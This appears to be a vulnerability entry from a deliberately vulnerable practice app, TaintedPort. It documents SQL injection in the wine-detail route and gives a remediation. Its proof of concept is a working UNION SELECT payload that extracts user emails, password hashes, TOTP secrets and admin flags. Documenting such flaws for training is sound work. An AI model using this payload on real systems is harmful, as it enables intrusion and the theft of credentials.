SQL Injection - Wine Detail (ID in URL)

TaintedPort

Back to App
Vuln ID TP-002 Title SQL Injection - Wine Detail (ID in URL) Severity critical Type SQLi HTTP Method GET URL /wines/:id Parameter id Filename - Code Location backend/api/models/Wine.php -> getByIdDirect() line 89

Description

The wine ID is directly concatenated into a SQL query. The route accepts non-numeric values, allowing SQL injection.

Proof of Concept

GET /wines/0 UNION SELECT 1,email,password_hash,name,5,6,7,8,totp_secret,is_admin,11,12,13,14,15 FROM users--

Remediation

Use a parameterized query with the id bound as an integer.